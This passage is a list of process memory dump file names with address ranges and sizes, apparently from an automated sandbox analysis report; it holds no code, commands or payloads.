10.8MB
-
memory/2500-49-0x00007FFFF3350000-0x00007FFFF3E11000-memory.dmpFilesize
10.8MB
-
memory/2500-10-0x00000117EF320000-0x00000117EF342000-memory.dmpFilesize
136KB
-
memory/2500-44-0x00007FFFF3350000-0x00007FFFF3E11000-memory.dmpFilesize
10.8MB
-
memory/2500-43-0x00007FFFF3353000-0x00007FFFF3355000-memory.dmpFilesize
8KB
-
memory/3028-52-0x0000000000400000-0x0000000000462000-memory.dmpFilesize
392KB
-
memory/4016-53-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/4372-21-0x0000000004C80000-0x0000000004CA2000-memory.dmpFilesize
136KB
-
memory/4372-40-0x0000000007BA0000-0x0000000008144000-memory.dmpFilesize
5.6MB
-
memory/4372-39-0x0000000006DE0000-0x0000000006E02000-memory.dmpFilesize
136KB
-
memory/4372-42-0x0000000008150000-0x0000000009AD3000-memory.dmpFilesize
25.5MB
-
memory/4372-38-0x0000000006EA0000-0x0000000006F36000-memory.dmpFilesize
600KB
-
memory/4372-37-0x0000000006120000-0x000000000613A000-memory.dmpFilesize
104KB
-
memory/4372-36-0x0000000007520000-0x0000000007B9A000-memory.dmpFilesize
6.5MB
-
memory/4372-35-0x0000000005BE0000-0x0000000005C2C000-memory.dmpFilesize
304KB
-
memory/4372-34-0x0000000005BA0000-0x0000000005BBE000-memory.dmpFilesize
120KB
-
memory/4372-33-0x00000000055D0000-0x0000000005924000-memory.dmpFilesize
3.3MB
-
memory/4372-23-0x00000000054E0000-0x0000000005546000-memory.dmpFilesize
408KB
-
memory/4372-22-0x0000000005470000-0x00000000054D6000-memory.dmpFilesize
408KB
-
memory/4372-20-0x0000000004DD0000-0x00000000053F8000-memory.dmpFilesize
6.2MB
-
memory/4372-19-0x00000000021F0000-0x0000000002226000-memory.dmpFilesize
216KB